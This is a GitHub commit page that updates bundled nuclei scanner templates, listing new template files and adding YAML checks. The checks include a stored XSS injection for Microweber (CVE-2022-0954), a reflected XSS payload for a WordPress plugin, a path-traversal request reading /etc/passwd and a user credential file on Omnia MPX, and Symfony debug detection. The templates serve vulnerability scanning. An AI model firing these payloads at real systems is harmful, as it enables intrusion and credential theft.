Skip to content

Commit

Permalink
1、up PoCs
Browse files Browse the repository at this point in the history
2、fixed filefuzz TestIs404 bug
3、fixed nuclei hang bug
 2022-08-04
  • Loading branch information
hktalent committed Aug 4, 2022
1 parent b112384 commit b540316
Show file tree
Hide file tree
Showing 19 changed files with 441 additions and 175 deletions.
101 changes: 40 additions & 61 deletions config/nuclei-templates/.new-additions
Original file line number Diff line number Diff line change
@@ -1,61 +1,40 @@
cves/2015/CVE-2015-4666.yaml
cves/2018/CVE-2018-1000856.yaml
cves/2018/CVE-2018-19136.yaml
cves/2018/CVE-2018-19137.yaml
cves/2018/CVE-2018-19751.yaml
cves/2018/CVE-2018-19752.yaml
cves/2018/CVE-2018-19892.yaml
cves/2019/CVE-2019-9922.yaml
cves/2021/CVE-2021-36450.yaml
cves/2022/CVE-2022-0656.yaml
cves/2022/CVE-2022-35416.yaml
exposed-panels/claris-filemaker-webdirect.yaml
exposed-panels/honeywell-xl-web-controller.yaml
exposed-panels/icewarp-panel-detect.yaml
exposed-panels/kafka-manager-panel.yaml
exposed-panels/noescape-login.yaml
exposed-panels/rustici-content-controller.yaml
exposed-panels/smartping-dashboard.yaml
exposed-panels/sonicwall-analyzer-login.yaml
exposed-panels/tembosocial-panel.yaml
exposed-panels/tenda-web-master.yaml
exposed-panels/tiny-file-manager.yaml
exposed-panels/veeam-backup-gcp.yaml
exposed-panels/vmware-carbon-black-edr.yaml
exposed-panels/vmware-cloud-availability.yaml
exposed-panels/vmware-cloud-director.yaml
exposed-panels/vmware-ftp-server.yaml
exposed-panels/vmware-horizon-daas.yaml
exposed-panels/vmware-vcenter-converter-standalone.yaml
exposed-panels/vmware-vcloud-director.yaml
exposed-panels/web-file-manager.yaml
exposures/configs/config-rb.yaml
exposures/configs/gcloud-config-default.yaml
exposures/configs/phpstan-config.yaml
exposures/configs/wgetrc-config.yaml
exposures/files/composer-auth-json.yaml
exposures/files/credentials-json.yaml
exposures/files/environment-rb.yaml
exposures/files/gcloud-access-token.yaml
exposures/files/gcloud-credentials.yaml
exposures/files/get-access-token-json.yaml
exposures/files/google-api-private-key.yaml
exposures/files/google-services-json.yaml
exposures/files/jsapi-ticket-json.yaml
exposures/files/npm-cli-metrics-json.yaml
exposures/files/oauth-credentials-json.yaml
exposures/files/secret-token-rb.yaml
exposures/files/service-account-credentials.yaml
exposures/files/symfony-properties-ini.yaml
exposures/files/token-info-json.yaml
exposures/files/token-json.yaml
exposures/files/wget-hsts-list-exposure.yaml
exposures/files/ws-ftp-ini.yaml
exposures/logs/event-debug-server-status.yaml
exposures/logs/git-logs-exposure.yaml
technologies/default-page-azure-container.yaml
technologies/default-parallels-plesk.yaml
technologies/json-server.yaml
technologies/samsung-smarttv-debug.yaml
vulnerabilities/other/opennms-log4j-jndi-rce.yaml
vulnerabilities/other/vmware-siterecovery-log4j-rce.yaml
cves/2018/CVE-2018-1000671.yaml
cves/2020/CVE-2020-13405.yaml
cves/2020/CVE-2020-9043.yaml
cves/2022/CVE-2022-0870.yaml
cves/2022/CVE-2022-0921.yaml
cves/2022/CVE-2022-0952.yaml
cves/2022/CVE-2022-0963.yaml
cves/2022/CVE-2022-1386.yaml
cves/2022/CVE-2022-1937.yaml
cves/2022/CVE-2022-2486.yaml
cves/2022/CVE-2022-2487.yaml
cves/2022/CVE-2022-2488.yaml
cves/2022/CVE-2022-30073.yaml
cves/2022/CVE-2022-34049.yaml
exposed-panels/goanywhere-mft-login.yaml
exposed-panels/mailwatch-login.yaml
exposed-panels/scriptcase/scriptcase-panel.yaml
exposed-panels/scriptcase/scriptcase-prod-login.yaml
exposures/apis/drupal-jsonapi-user-listing.yaml
misconfiguration/springboot/springboot-caches.yaml
misconfiguration/springboot/springboot-flyway.yaml
misconfiguration/springboot/springboot-scheduledtasks.yaml
technologies/nextcloud-owncloud-detect.yaml
token-spray/api-clickup.yaml
token-spray/api-clockify.yaml
token-spray/api-cloudconvert.yaml
token-spray/api-codestats.yaml
token-spray/api-craftmypdf.yaml
token-spray/api-flowdash.yaml
token-spray/api-html2pdf.yaml
token-spray/api-monday.yaml
token-spray/api-pdflayer.yaml
vulnerabilities/backdoor/jexboss-backdoor.yaml
vulnerabilities/jira/jira-servicedesk-signup.yaml
vulnerabilities/other/cvms-sqli.yaml
vulnerabilities/other/loancms-sqli.yaml
vulnerabilities/other/weiphp-sql-injection.yaml
vulnerabilities/other/zms-sqli.yaml
vulnerabilities/other/zzcms-xss.yaml
vulnerabilities/wordpress/analytify-plugin-xss.yaml
2 changes: 1 addition & 1 deletion config/nuclei-templates/cves/2022/CVE-2022-0921.yaml
Original file line number Diff line number Diff line change
Expand Up @@ -17,7 +17,7 @@ info:
cve-id: CVE-2022-0954
cwe-id: CWE-79
metadata:
verified: "true"
verified: true
tags: cve,cve2022,xss,microweber

requests:
Expand Down
57 changes: 57 additions & 0 deletions config/nuclei-templates/cves/2022/CVE-2022-0954.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,57 @@
id: CVE-2022-0954

info:
name: Microweber - Cross-site Scripting
author: amit-jd
severity: medium
description: |
Multiple Stored Cross-site Scripting (XSS) Vulnerabilities in Shop's Other Settings, Shop's Autorespond E-mail Settings and Shops' Payments Methods in GitHub repository microweber/microweber prior to 1.2.11.
reference:
- https://github.com/advisories/GHSA-8c76-mxv5-w4g8
- https://huntr.dev/bounties/b99517c0-37fc-4efa-ab1a-3591da7f4d26/
- https://github.com/microweber/microweber/commit/955471c27e671c49e4b012e3b120b004082ac3f7
- https://nvd.nist.gov/vuln/detail/CVE-2022-0954
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score: 5.4
cve-id: CVE-2022-0954
cwe-id: CWE-79
metadata:
verified: "true"
tags: cve,cve2022,xss,microweber

requests:
- raw:
- |
POST /api/user_login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
username={{username}}&password={{password}}
- |
POST /api/save_option HTTP/2
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: {{BaseURL}}/admin/view:shop/action:options
option_key=checkout_url&option_group=shop&option_value=%22%3E%3CiMg+SrC%3D%22x%22+oNeRRor%3D%22alert(document.domain)%3B%22%3E&module=shop%2Forders%2Fsettings%2Fother
- |
POST /module/ HTTP/2
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: {{BaseURL}}/admin/view:shop/action:options
module=settings%2Fsystem_settings&id=settings_admin_mw-main-module-backend-settings-admin&class=card-body+pt-3&option_group=shop%2Forders%2Fsettings%2Fother&is_system=1&style=position%3A+relative%3B
cookie-reuse: true
req-condition: true
matchers:
- type: dsl
dsl:
- 'contains(body_2,"true")'
- contains(body_3,'\"><img src=\"x\" onerror=\"alert(document.domain);\">\" placeholder=\"Use default')
- 'contains(all_headers_3,"text/html")'
- 'status_code_3==200'
condition: and
39 changes: 39 additions & 0 deletions config/nuclei-templates/cves/2022/CVE-2022-1906.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,39 @@
id: CVE-2022-1906

info:
name: Copyright Proof <= 4.16 - Reflected Cross-Site-Scripting
author: random-robbie
severity: medium
description: |
The plugin does not sanitise and escape a parameter before outputting it back via an AJAX action available to both unauthenticated and authenticated users, leading to a Reflected Cross-Site Scripting when a specific setting is enabled.
reference:
- https://wpscan.com/vulnerability/af4f459e-e60b-4384-aad9-0dc18aa3b338
- https://nvd.nist.gov/vuln/detail/CVE-2022-1906
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1906
metadata:
verified: true
google-dork: inurl:/wp-content/plugins/digiproveblog
tags: cve,cve2022,wordpress,xss,wp-plugin,wp

requests:
- raw:
- |
GET /wp-admin/admin-ajax.php?action=dprv_log_event&message=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- "got message <script>alert(document.domain)</script>"
condition: and

- type: word
part: header
words:
- text/html

- type: status
status:
- 200
40 changes: 0 additions & 40 deletions config/nuclei-templates/dns/cname-service-detection.yaml

This file was deleted.

25 changes: 25 additions & 0 deletions config/nuclei-templates/exposed-panels/jamf-setup-assistant.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,25 @@
id: jamf-setup-assistant

info:
name: Jamf Pro Setup Assistant
author: ritikchaddha
severity: info
metadata:
verified: true
shodan-query: http.html:"Jamf Pro Setup"
tags: jamf,setup,panel

requests:
- method: GET
path:
- "{{BaseURL}}/setupAssistant.html"

matchers-condition: and
matchers:
- type: word
words:
- "Jamf Pro Setup Assistant"

- type: status
status:
- 200
12 changes: 8 additions & 4 deletions config/nuclei-templates/exposures/configs/symfony-profiler.yaml
Original file line number Diff line number Diff line change
Expand Up @@ -4,16 +4,20 @@ info:
name: Symfony Profiler
author: pdteam
severity: high
metadata:
verified: true
shodan-query: http.html:"symfony Profiler"
tags: config,exposure,symfony

requests:
- method: GET
path:
- "{{BaseURL}}/_profiler/empty/search/results?limit=10"
- "{{BaseURL}}/app_dev.php/_profiler/empty/search/results?limit=10"

stop-at-first-match: true
matchers:
- type: word
words:
- "<title>Symfony Profiler</title>"
- "symfony/profiler/"
condition: and
part: body
words:
- "Symfony Profiler"
35 changes: 35 additions & 0 deletions config/nuclei-templates/misconfiguration/symfony-debug.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,35 @@
id: symfony-debug

info:
name: Symfony Debug Mode
author: organiccrap,pdteam
severity: high
description: A Symfony installations 'debug' interface is enabled, allowing the disclosure and possible execution of arbitrary code.
reference:
- https://github.com/synacktiv/eos
metadata:
verified: true
shodan-query: http.html:"symfony Profiler"
tags: symfony,debug

requests:
- method: GET
path:
- '{{BaseURL}}'

matchers-condition: or
matchers:
- type: word
part: header
words:
- 'x-debug-token-link:'
- '/_profiler/'
condition: and
case-insensitive: true

- type: word
part: body
words:
- 'debug mode</a> is enabled.'

# Enhanced by mp on 2022/04/12

This file was deleted.

35 changes: 35 additions & 0 deletions config/nuclei-templates/vulnerabilities/other/omnia-mpx-lfi.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,35 @@
id: omnia-mpx-lfi

info:
name: Omnia MPX 1.5.0+r1 - Path Traversal
author: arafatansari,ritikchaddha
severity: high
description: |
Omnia MPX 1.5.0+r1 is vulnerable to Path Traversal.
reference:
- https://www.exploit-db.com/exploits/50996
metadata:
verified: true
shodan-query: http.html:"Omnia MPX"
tags: omnia,mpx,lfi,traversal

requests:
- method: GET
path:
- "{{BaseURL}}/logs/downloadMainLog?fname=../../../../../../..//etc/passwd"
- "{{BaseURL}}/logs/downloadMainLog?fname=../../../../../../..///config/MPXnode/www/appConfig/userDB.json"

stop-at-first-match: true
matchers-condition: or
matchers:
- type: regex
regex:
- "root:[x*]:0:0"

- type: word
part: body
words:
- '"username":'
- '"password":'
- '"id":'
condition: and
Loading

0 comments on commit b540316

Please sign in to comment.